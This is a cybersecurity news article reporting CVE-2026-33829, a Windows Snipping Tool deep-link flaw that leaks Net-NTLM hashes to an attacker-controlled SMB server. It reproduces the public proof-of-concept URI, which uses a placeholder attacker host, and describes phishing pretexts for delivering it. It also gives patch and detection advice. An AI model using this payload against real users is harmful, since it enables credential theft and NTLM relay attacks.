PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability - CyberSecurityNews

HomeCyber Security PoC Exploit Released for Windows Snipping Tool NTLM Hash Leak Vulnerability By Guru Baran April 21, 2026 A proof-of-concept (PoC) exploit has been publicly released for a newly disclosed vulnerability in Microsoft’s Snipping Tool that allows attackers to silently steal users’ Net-NTLM credential hashes by luring them to a malicious webpage. Tracked as CVE-2026-33829, the flaw resides in how Windows Snipping Tool handles deep link URI registrations using the ms-screensketch protocol schema. Affected versions of the application register this deep link, which accepts a filePath parameter. Due to a lack of proper input validation, an attacker can supply a UNC path pointing to a remote, attacker-controlled SMB server, coercing an authenticated SMB connection and capturing the victim’s Net-NTLM hash in the process. The vulnerability was discovered and reported by security researchers at Black Arrow, who coordinated disclosure with Microsoft prior to going public. Windows Snipping Tool PoC Exploitation requires minimal technical sophistication. An attacker simply needs to host a malicious URL — or an HTML page that auto-triggers the deep link and convince the target to visit it. The PoC from Black Arrow Security demonstrates the attack with a single browser-triggered URI: textms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&source=Toast When a victim opens this link, Snipping Tool launches and silently attempts to load the remote resource over SMB. During this connection attempt, Windows automatically transmits the user’s Net-NTLM authentication response to the attacker’s server, exposing credentials that can then be cracked offline or used in NTLM relay attacks against internal network resources. What makes CVE-2026-33829 particularly dangerous is how naturally it lends itself to social engineering campaigns. Because the Snipping Tool actually opens during exploitation, the attack is visually consistent with believable pretexts such as asking an employee to crop a corporate wallpaper, edit a badge photo, or review an HR document. An attacker could register a domain like snip.example.com and serve a convincing image URL that silently delivers the malicious deep link payload behind the scenes. The victim sees nothing unusual; the Snipping Tool opens as expected while NTLM authentication occurs transparently in the background. This attack vector is especially effective in corporate environments where phishing emails referencing internal HR portals, IT helpdesks, or shared document systems are common. Patch Availability and Timeline Microsoft addressed the vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline is as follows: March 23, 2026 — Vulnerability reported to Microsoft. April 14, 2026 — Microsoft releases a security patch. April 14, 2026 — Coordinated public advisory and PoC release. Organizations and individual users running affected versions of the Windows Snipping Tool should immediately apply the April 14, 2026, security update. Security teams should also monitor internal networks for unexpected outbound SMB connections (port 445) to external or unknown hosts, which could indicate active exploitation attempts. Blocking outbound SMB traffic at the network perimeter remains a strong defensive measure regardless of patch status. Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories. Copy URL Linkedin Twitter ReddIt Telegram Guru Baranhttps://cybersecuritynews.com Gurubaran KS is a cybersecurity analyst, and Journalist with a strong focus on emerging threats and digital defense strategies. He is the Co-Founder and Editor-in-Chief of Cyber Security News, where he leads editorial coverage on global cybersecurity developments. Trending News Hackers Use Fake Chrome Web Store Copyright Notices to Steal Google Credentials CISA Warns of SolarWinds Serv-U Vulnerability Exploited in Attacks Bots Surpass Humans in Global Web Traffic for the First Time in Internet History 1-Click GitHub Token Vulnerability Lets Attackers Steal Users’ OAuth Tokens Agentic AI Red Teaming Reveals Zero-Click Human-in-the-Loop Bypass Attack Chains Latest News Cyber Security Instagram Fixes Password Reset Flaw That Exposes User Emails and Phone Numbers Cyber Security News CISA Warns of Linux Kernel Improper Authentication Vulnerability Exploited in Attacks Cyber Security New ChatGPT Lockdown Mode to Mitigate Prompt Injection and Data Exfiltration Attacks Cyber Security Free Apps on Samsung and LG Smart TVs Secretly Turning Your Devices Into AI Proxies Cyber Security News CISA Warns of SolarWinds Serv-U Vulnerability Exploited in Attacks